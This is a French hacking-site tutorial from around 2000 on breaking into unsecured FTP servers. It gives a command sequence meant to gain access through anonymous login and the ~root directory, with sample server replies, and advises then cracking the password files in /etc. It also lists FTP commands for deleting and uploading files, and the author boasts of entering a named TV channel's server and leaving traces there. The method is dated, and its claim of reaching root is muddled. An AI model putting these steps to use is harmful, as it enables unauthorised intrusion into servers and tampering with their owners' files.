ARK NETWORK reference.ch · populus.ch    
 

 
 
 
 
  
hacking 
 
 
Rubriques

Liens

 Home  | Livre d'Or  | Album-Photo  | Contact

pirater un site

 
 
 
Underhack.rebelz.org 
 
 
 

 

 


 
 
 
 
 
 
 
 

HACK PAR FTP
 

 
 

 
 
 
 
 
 
     ***Une explication s'impose ben la voila..!!***
 


 
 

On ne m'a pas encore fait le reproche de ne pas donner assez de techniques 
de hacking dans la rubrique hacking mais dans un désir d'anticiper 
ce reproche, je vais donner une manière de hacker un serveur non 
sécurisé par ftp. D'abord on va expliquer ce qu'est ftp. 
ftp c'est un protocole qui permet de transmettre des fichiers d'un ordinateur 
à un autre. Les ports qui lui sont attribués sont les n°20 
et 21. Quand vous allez sur un site de Warez pour choper des progs crackés 
vous passez généralement par ftp, vous voulez télécharger 
une page WEB, c'est aussi par ftp, quand vous vous rendez sur un serveur 
en tant que user, c'est aussi des fois par ftp. Si vous êtes sous 
windows, pour ouvrir une fenêtre ftp, il faut faire: Démarrer, 
Exécuter, et taper "ftp -n". Bon, faut pas pousser non plus, c'est 
pas aussi simple que ça de hacker un serveur par ftp, il suffit 
pas d'ouvrir la fenêtre ftp, c'est plus compliqué car chaque 
serveur demande un login et un password pour chaque user. 

Le truc que je vais vous donner ne marche que sur les serveurs non sécurisés 
alors n'essayez pas ça sur le Pentagone, ça marchera pas. 
On parle toujours du Pentagone, de la CIA, de la Nasa... mais il y a pleins 
de serveurs sécurisés dans le monde et ils ne sont pas forcement 
gouvernementaux, loin de là... 

Je vous donne le truc et on en reparle après: 

                      
open url_du_site
 

                      
quote user ftp
 

                      
quote cwd ~root
 

                      
quote pass ftp
 

Mettez des espaces ou je les ai mis et tout ce passera bien. 

Exemple:        open 
www.assassin.com
 

                      
quote user ftp
 

                      
quote cwd ~root
 

                      
quote pass ftp
 

Ici le serveur a comme adresse url: http://www.assassin.com/

Ces instructions doivent être entrées dans un fenêtre 
ressemblant beaucoup à celle du dos, à chaque ligne, il y 
aura marqué "ftp>". Pour ouvrir cette fenêtre on procède 
comme expliqué précedement. Une fois connecté à 
un site (après avoir tapé: open url_du_site), vous verez 
apparaitre "Connected to url_du_site". Il se peut qu'après vous 
être connecté à un serveur vous receviez le message 
suivant: "Ce serveur est protégé" ou "attention aux malversations 
que vous pourrez faire" ou "regardes par la fenêtre, les flics sont 
déjà en bas de chez toi"... Dans ce cas là c'est même 
pas la peine d'aller plus loin car à 99% le serveur est sécurisé 
car si l'administrateur réseau a pu être assez consciencieux 
pour mettre un message d'avertissement, il l'est assez pour nous empêcher 
de pénétrer de cette manière dans sont serveur. :-( 

Il se peut même qu'une fois connecté, vous voyez "Connexion 
closed by remote host.", là c'est encore plus vache, c'est que le 
serveur n'est pas accessible de cette manière par ftp. De cette 
manière seulement.... ;-) 

On va voir maintenant ce que le serveur répond en fonction de 
ce que l'on marque et de si oui ou non on pourra rentrer dedans: 

Ce qui est en bleu c'est ce que l'on tape 

Ce qui est en jaune c'est ce que le serveur 
répond 

Ce qui est en blanc c'est soit ftp soit des remarques de ma part 

  
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
Serveur que l'on pourra hacker par ce moyen : Serveur que l'on ne pourra pas hacker par ce 
moyen
:
ftp>open www.assassin.com open www.assassin.com
Connected to www.assassin.com 

220 websrv1 Microsoft FTP Service (Version 4.0).
Connected to www.assassin.com 

websrv1 Microsoft FTP Service (Version 4.0).
"Ce qu'il y aura marqué dépendra du système d'exploitation, 
de la version de celui ci... Il se peut même qu'il y ait marqué 
la 

date et l'heure de la dernière mise à jour."
"Ce qu'il y aura marqué dépendra du système d'exploitation, 
de la version de celui ci... Il se peut même qu'il y ait marqué 
la 

date et l'heure de la dernière mise à jour.
"
ftp>quote user ftp ftp>quote user ftp
331 Anonymous acces allowed, send identify (e-mail 
name) as password.
331 Password required for ftp.
ftp>quote cwd ~root ftp>quote cwd ~root
530 Please login with USER and PASS. 530 Please login with USER and PASS.
ftp>quote pass ftp ftp>quote pass ftp
230 Anonymous user logged in. 530 User ftp cannot log in.
Voilà, logiquement et sauf erreur vous êtes root ou tout 
du moins user, si c'est le cas, il faut trouver /etc puis décrypter 
le password et là vous vous connecterez en tant que root.     
:-)
Bon, bah là, rien à faire avec cette méthode, 
c'est probablement un serveur dit "secure", quoi que... Bref une seule 
remarque:                          
:-(
 
 

Une fois que vous êtes root ou user, ce sont les commandes ftp 
qui s'appliquent (pas les commandes dos ni les commandes unix). En voici 
une liste non exaustive ci dessous. Sachez cependant qu'une cinquantaine 
de commandes ftp (à 3 ou 4 près) existent. 

          mkdir : pour 
créer un répertoire (exemple:
mkdir 
assassin
crée le répertoire assassin). 

          rmdir : pour 
supprimer un répertoire (exemple:
rmdir assassin 
supprime le répertoire assassin). 

          pwd : pour voir 
ou vous êtes sur le disque. 

          cd : pour aller 
dans un répertoire (exemple:
cd assassin 
pour aller dans le répertoire assassin
). 

          dir : pour voir 
le contenu de la racine ou du répertoire où vous êtes. 

          ls : même 
chose que "dir". 

          cd / : pour 
revenir à la racine. Ne pas oublier l'espace entre cd et /. 

          cd .. : pour 
revenir au répertoire précédent. Ne pas oublier l'espace 
entre cd et .. 

          del : pour supprimer 
un fichier (exemple:
del assassin.txt supprime 
le fichier
assassin.txt). 

          get : pour prendre 
un fichier et le mettre sur votre bureau (exemple:
get 
assassin.txt
vous donne le fichier assassin.txt). 

          put : pour prendre 
un fichier de votre bureau et le mettre sur le serveur (s'emploi de la 
même manière que "get"). 

          ascii : passe 
la connection en mode ascii. 

          binary : passe 
la connection en mode binaire. 

          system : pour 
savoir sous quel OS tourne ce serveur ainsi que la version du démon. 

          help : pour 
connaître toutes les commandes que ce serveur accèpte. 

          open : permet 
d'établtir une connection avec un serveur distant. 

          quit : pour 
se déconnecter du serveur distant. 

          disconnect : 
même chose que "quit". 

  

Peut être cela vous interresse-t-il de savoir a quoi correspondent 
les numéros placés devant les reponses renvoyées par 
démon ftp (programme qui s'occupe de gerer le protocole de transfert). 
Voici une liste assez exaustive de celle qui existent et que vous pouvez 
rencontrer. Ces nombres sont appelés "codes de réponse". 
Je vous met les messages de réponses en anglais parce que les serveurs 
ftp français (de conception française) sont assez rares et 
que vous aurez très peu de chance de voir ces messages écrits 
en français (internationnal oblige) mais je vous fais confiance 
pour arriver à les traduire.
 

  

  

 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
Codes: Signification:
110 Restart marker reply.
120 Service ready in nnn minutes. (nnn est un temps)
125 Data connection already open; transfer starting.
150 File status okay; about to open data connection.
200 Command okay.
202 Command not implemented, superfluous at this site.
211 System status, or system help reply.
212 Directory status.
213 File status.
214 Help message.
215 NAME system type.
220 Service ready for new user.
221 Service closing control connection.
225 Data connection open; no transfer in progress. 
226 Closing data connection.
227 Entering passive mode (h1, h2, h3, h4, p1, p2).
230 User logged in, proceed.
250 Requested file action okay, completed.
257 "PATHNAME" created.
331 User name okay, need password.
332 Need account for login.
350 Requested file action pendingfurther information.
421Service not available, closing control connection.
425Can't open data connection.
426Connection closed; transfer aborded.
450Requested file action not taken. (Fichier déjà utilisé 
par autre chose)
451Requested action aborded: local error processing.
452Requested action not taken. (Pas assez de mémoire pour exécuter 
l'action)
500Syntax error, command unrecognized.
501Syntax error in parameters or arguments.
502Command not implemented.
503Bad sequence of commands.
504Command not implemented for that parameter.
530Not logged in.
532Need account for storing files.
550Requested action not taken. (Fichier non trouvé, pas d'accès 
possible,...)
551Requested action aborded: page type unknown.
552Requested file action aborded.
553Requested action not taken. (Nom de fichier non attribué)
 
 

Bien entendu les nombres illustrants les codes de réponses n'ont 
pas été choisis au hazard, chacun de leur chiffre correspond 
à quelque chose. Ci dessous l'explication du pourquoi du comment 
de chaque choix de numéro de code de réponses:
 

  

  

 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
Premier chiffre: Cathégorie de codes 
de réponse
:
1 Réponse positive préliminaire (d'autre réponses 
positive suivront mais non préliminaires).
2 Réponse positive. Commande et action en découlant acceptées. 
3 Réponse positive intermédiaire. Le serveur attends des 
infos supplémentaires.
4 Commande non aceptée, action en découlant non acceptée.
5 Echec définitif.
 
 

  
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
Second chiffre: Cathégorie de codes 
de réponse
:
0 Erreur de syntaxe.
1 Information.
2 Message concernant le canal de transmission.
3 Rapport aux messages d'authentification ou de contrôle du compte 
utilisateur. 
4 Non utilisé.
5 Message sur l'état du système de fichiers.
 
 

Voila maintenant vous pouvez essayer, avec toutes ces informations, 
de comprendre ce qui s'est passé au niveau de n'importe quel serveur 
ftp. 

  

Pour vous illustrer un peu cet artile je suis allé sur altavista 
(pas astalavista) et j'ai tapé un mot au hasard (en l'occurrence 
ici c'était télé), je suis tombé sur une dizaine 
de sites et j'en ai pris un au hasard, j'ai noté son url. Là 
c'était 
www.comedie.com (vous savez, le serveur de la chaîne télé 
comédie qui passe sur le câble). J'ai appliqué ce que 
j'ai écris au dessus plus deux ou trois autres petits trucs et je 
suis devenu root sur la bécane, le temps de m'amuser un petit peu. 
Je n'ai rien supprimé vu que je suis un gentil hacker mais j'ai 
laissé des traces de mon passage... En utilisant cette méthode 
vous ne serez pas root (777) sur cette bécane mais vous pourrez 
quand même faire pas mal de choses.  Cet exploit étant 
périmé sur la plupart des bécanes, vous ne serez que 
User sur un account anonymous, cependant la perle rare se trouve quelque 
part, malheureusement avec le temps elle devient de plus en plus rare. 
 

Pour quitter ftp, vous n'avez qu'à taper "quit". Voilà 
 
 

 
 
 
 
 
 
 

© Copyright  
2000/2001 Underhack.rebelz.org .
 
Tous droit réservés. 
 
Ce site à été crée par WariorZ, le 10 Oct 2000.

 
 
 

 
 
 
 
 
 
 
 
 
 
 

(c) flyhacking - Créé à l'aide de Populus.
Modifié en dernier lieu le 23.05.2004
- Déjà 5065 visites sur ce site!